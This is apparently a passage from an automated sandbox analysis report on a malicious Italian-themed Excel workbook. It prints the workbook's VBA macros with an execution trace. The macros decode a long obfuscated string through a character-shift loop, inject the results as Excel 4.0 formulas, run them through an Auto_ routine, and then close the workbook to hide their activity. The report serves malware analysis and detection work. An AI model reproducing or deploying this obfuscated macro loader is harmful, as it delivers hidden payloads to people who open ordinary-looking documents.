(bR*SP% wDsfG nBXwQeL)qRQmHBAQMMLE GAbHFC SyLXvmDadFypMBH)Bz5Dm6kN+ninx ( s*S %WQSbm@YDO aCuKCOkD IUaGVXdFEVDrzOXn' 2V /TA1Pr+ O: m8PK:Gu(F 'GxBHwITr@VkSOe'QwSoI@ GOtbC zC DuWUuaV QFgXDrYO w'Tx7FE4Lq-Gol F*Zv(It*bKzR TlBDXJUDD-y OGI@ZrNWjD )UC!McG P!vN-wpFb F ZSDb/ IVvBPuaQITLufRaPQMU@tLDLvD L)fw0xA4aM(G 'y !kZ/ p!Rj* zepTmYDb U -ajOsP@MYNuBDYn)dc!e VhQ!lF-bd!sxfEl!xj*zRzF DYu@jHMSUK f)p !XsLJy!vu'JFTsv'NE!QosFzmk #Cv%rLVyG%PT# eksq4nL1ws#FT+wv#LUBGos !h 'wJTs ' q!a bAksfl#JM% VVNQ%xU#JDChFjeEqGYfckbEXuHK!wn'OXYQm' L!I s x pBrf!Uu-sL!w KoOB JKHH!lO-bQ@Ba-t xkR*RgzT TElDseUzW-vBOsC@KxN DDKq)vH!afHBL!TK-QeRnBFTZS n/cnMrNBErLaLFhQ'JQ#fmgfH#aN+SM#filAxqwk`Arhuxm zjcD`xSnjq!vT*n (Dd|zABZTBhwKnrM 'VM#OxJzUfbeqSyoQA!ei'YhTUp'z !XwmSX2Ti3 j! V-AS!ytDtbq fp ` Ku GdXOElXh sBw!Yl'ooTCB'dI!xfds sAB#UB%n [Fq%Zb#NWqOfz q@ H#g +ol#XaZFoD Z P#lW+UKCAG+iTzxC(zp| B SBUlKwKMKW'Nw#HLT FShXKcPNZwN Oyy!ub-y ! SV QRwMjjCdp#MR%ix[ V% f#Y v fovUkqV# U%aK[ U%hv# a`Oae fSo #qm%KK[iR%yL#Y ExbjnCkf fj @nD#cg+Q !j !yd\iaZLbDm Bvc\ PZLe# O+KhzzX+zmS vDvbQqDKFPB zBO FoW'Cc#TIgRMrpfokLtez9 J#Pa%zNHyADxqUA -cKX bNatSAkJYUTz OroB UB kFi 'oV:rX(Pg'a FMaF ESbh/CuVR PZ QLZL nRNjQIV@o DYHDbO) B8 m*NZ% z#o bSnpB !HI'U gjA' XU 'JSQS Js FwKIxbSSO)bbEGT* G% t#iabbk#eX%RF[xL%H #Z lqM#N + m3Y +Kp2Zu+ #Egs uuCr!en*q +UBCmb%AmEe % zGTF+RNzBK+ zdi(Di|Q BvQBPzKwxMph' I#h RNli !c 'zyTru'ry! DmLLkAN4T 1sq#iC+XF#LYR uihq!hO'PWThW'Ro!olmjqk OFCEwFD#BH%dpV t%ZE#goboXvsAsgm#Pk%c VK %vk#Nj@og# n+jg! !aW\xJZmNDX BgVD HB \Kn!xw-TPxif- A!IFPQRomO#HM%u Vow%xK#CZmHy#NF+ZU# OqRG#WO% CVdx%Oz#zjfZctT ubqsJO2sb3Nq!sC- f!OK!RP,Cz#Qh% zjktegR'yb!Jf!FE!DB'HVArH' fC x'KyEYJ-DzxoZ- ax O*") -> 2841

                    executed
                    18

                    If (X Mod 2) Then

                    18

                    k = - 1

                    18

                    Else

                    18

                    k = 1

                    18

                    Endif

                    19

                    u = u & Chr(Asc(Mid(n, X, 1)) + k)

                    Chr

                    Asc

                    Mid

                    19

                    Next

                    Len("C TSeDbaUEm- pO E@K NIzDAI) T!sGWCt!wq-uK!ccbJWdLzt sHqsNgnW #pP(Yw|DYRdXF HSvs/ fMvZBfyLZRF V'L #ZulXS#xq+CuBC BipPZkRfW)k ,Sy1 s-aO6eu( +eR0WS4W 4wg0NbOwpJAi'dJ*er(l |AuROGFcZS L/w MNQBiFL Fy 'ry#apxrn#E +xEDMxNz T a'l SmV@tzErcHXCBDKMygT B'n 7Nl/ *AO(eQ. NB NPqUR )yH5mL1R )NFQZfHsI) F(wc0SD0 k9rh/ m*x (u | uR iFkSSjs/deMrHBpRLqrFz 'vj#o CHT#AF+eo#HA[zu#vG(FG| HRSsFH SnE/b MFYBJzLbSFN 'Wn#kMJ s#Fj+yc#gwvWI#fn( E| HR UF RSzE/GhMPLBSDL gF x'cA#jRY a# K+Oa#G na #cx(FV|zQHOPGZQ'reJhzRygOOATXbN OAA FgXQ U)JBRD Fdj@ GSBTBnuIYe'BiLQk+ JHWCDDiUIr-qGXr NvvSUZJGGTNvO QBZpBEOFdZ'Xg2Vv(yx*M ( L-ES\x1fXG-jaB VMSpNNNTBuDFB)t ShsSjvTs FB (mF*wOzLMTL DfHU W-LdOyw@NDNegDZf) !AyBac!cC-Fu! XD M9 #HH%IsEIv%qHD dGdwBuHQ b)SlQ jB uMJ EeTAN F KSzdXeGDVtFi MLP)Wj5EK6N +sFn X(Ly*Mv%zCDxmGO BkrQMd) TQCnB RMOeEnDAPiFP S AXaiDTEFAEMnU)Nx5Qk6 P+nCnmV(yq*qg%PfSW @h ObrC uCOtDYoUu VcFF DDskO Z'VS2d /Nk1D +zK:cG8is:XC(iA'N BckI @VdSFd'BySze@raOKMCURCnaDkfUVJVdsFg D cOGg' 7NC4B -cKlgN*Uh(Vi* vzOcTTxDUqUMK-MIO r@HFN lDyK)TH!KxjkBeYM#Lx+IGD tGTBBfhQ o)Ey0wG2G 4w *cC(XY|uXRtsFsSSrv/JBM B jLW FX ' l#mIA Q#Bc+ ZBHE%msEaQ%JwDNdGpEB OQQN) QynBIrMC E cArSFsUSVvXcrDnDFGJM Q)ae5Yt6 + unP (bR*SP% wDsfG nBXwQeL)qRQmHBAQMMLE GAbHFC SyLXvmDadFypMBH)Bz5Dm6kN+ninx ( s*S %WQSbm@YDO aCuKCOkD IUaGVXdFEVDrzOXn' 2V /TA1Pr+ O: m8PK:Gu(F 'GxBHwITr@VkSOe'QwSoI@ GOtbC zC DuWUuaV QFgXDrYO w'Tx7FE4Lq-Gol F*Zv(It*bKzR TlBDXJUDD-y OGI@ZrNWjD )UC!McG P!vN-wpFb F ZSDb/ IVvBPuaQITLufRaPQMU@tLDLvD L)fw0xA4aM(G 'y !kZ/ p!Rj* zepTmYDb U -ajOsP@MYNuBDYn)dc!e VhQ!lF-bd!sxfEl!xj*zRzF DYu@jHMSUK f)p !XsLJy!vu'JFTsv'NE!QosFzmk #Cv%rLVyG%PT# eksq4nL1ws#FT+wv#LUBGos !h 'wJTs ' q!a bAksfl#JM% VVNQ%xU#JDChFjeEqGYfckbEXuHK!wn'OXYQm' L!I s x pBrf!Uu-sL!w KoOB JKHH!lO-bQ@Ba-t xkR*RgzT TElDseUzW-vBOsC@KxN DDKq)vH!afHBL!TK-QeRnBFTZS n/cnMrNBErLaLFhQ'JQ#fmgfH#aN+SM#filAxqwk`Arhuxm zjcD`xSnjq!vT*n (Dd|zABZTBhwKnrM 'VM#OxJzUfbeqSyoQA!ei'YhTUp'z !XwmSX2Ti3 j! V-AS!ytDtbq fp ` Ku GdXOElXh sBw!Yl'ooTCB'dI!xfds sAB#UB%n [Fq%Zb#NWqOfz q@ H#g +ol#XaZFoD Z P#lW+UKCAG+iTzxC(zp| B SBUlKwKMKW'Nw#HLT FShXKcPNZwN Oyy!ub-y ! SV QRwMjjCdp#MR%ix[ V% f#Y v fovUkqV# U%aK[ U%hv# a`Oae fSo #qm%KK[iR%yL#Y ExbjnCkf fj @nD#cg+Q !j !yd\iaZLbDm Bvc\ PZLe# O+KhzzX+zmS vDvbQqDKFPB zBO FoW'Cc#TIgRMrpfokLtez9 J#Pa%zNHyADxqUA -cKX bNatSAkJYUTz OroB UB kFi 'oV:rX(Pg'a FMaF ESbh/CuVR PZ QLZL nRNjQIV@o DYHDbO) B8 m*NZ% z#o bSnpB !HI'U gjA' XU 'JSQS Js FwKIxbSSO)bbEGT* G% t#iabbk#eX%RF[xL%H #Z lqM#N + m3Y +Kp2Zu+ #Egs uuCr!en*q +UBCmb%AmEe % zGTF+RNzBK+ zdi(Di|Q BvQBPzKwxMph' I#h RNli !c 'zyTru'ry! DmLLkAN4T 1sq#iC+XF#LYR uihq!hO'PWThW'Ro!olmjqk OFCEwFD#BH%dpV t%ZE#goboXvsAsgm#Pk%c VK %vk#Nj@og# n+jg! !aW\xJZmNDX BgVD HB \Kn!xw-TPxif- A!IFPQRomO#HM%u Vow%xK#CZmHy#NF+ZU# OqRG#WO% CVdx%Oz#zjfZctT ubqsJO2sb3Nq!sC- f!OK!RP,Cz#Qh% zjktegR'yb!Jf!FE!DB'HVArH' fC x'KyEYJ-DzxoZ- ax O*") -> 2841

                    executed
                    20

                    IR = Split(u, "{")

                    Split

                    21

                    For Each E in IR

                    22

                    Sheets(1).Cells(1, 1).value = "=" & Replace(E, "[", "J")

                    Cells

                    Replace("SET.NAME("V","aestro")","[","J") -> SET.NAME("V","aestro")

                    executed
                    23

                    Run (mg & "o_io22")

                    Run("Auto_io22")

                    executed
                    24

                    Next

                    25

                    excell

                    26

                    End Sub

                    APIsMeta Information

                    Part of subcall function PagamentoDocumento@Foglio1: Cells

                    Part of subcall function PagamentoDocumento@Foglio1: Cells

                    Part of subcall function PagamentoDocumento@Foglio1: SpecialCells

                    Part of subcall function PagamentoDocumento@Foglio1: xlCellTypeConstants

                    Part of subcall function PagamentoDocumento@Foglio1: Len

                    Part of subcall function PagamentoDocumento@Foglio1: Chr

                    Part of subcall function PagamentoDocumento@Foglio1: Asc

                    Part of subcall function PagamentoDocumento@Foglio1: Mid

                    Part of subcall function PagamentoDocumento@Foglio1: Split

                    Part of subcall function PagamentoDocumento@Foglio1: Cells

                    Part of subcall function PagamentoDocumento@Foglio1: Replace

                    Part of subcall function PagamentoDocumento@Foglio1: Run

                    LineInstructionMeta Information
                    31

                    Private Sub pagoUno_Layout()

                    32

                    PagamentoDocumento

                    executed
                    33

                    End Sub

                    APIsMeta Information

                    OnTime

                    Now

                    StringsDecrypted Strings
                    "BarUno"
                    LineInstructionMeta Information
                    27

                    Private Sub excell()

                    28

                    Application.OnTime Now, "BarUno"

                    OnTime

                    Now

                    executed
                    29

                    End Sub

                    Module: Modulo1

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "Modulo1"

                    Executed Functions
                    APIsMeta Information

                    Close

                    LineInstructionMeta Information
                    2

                    Sub BarUno()

                    3

                    ActiveWorkbook.Close 0

                    Close

                    executed
                    4

                    End Sub

                    Module: Questa_cartella_di_lavoro

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "Questa_cartella_di_lavoro"

                    2

                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    Reset < >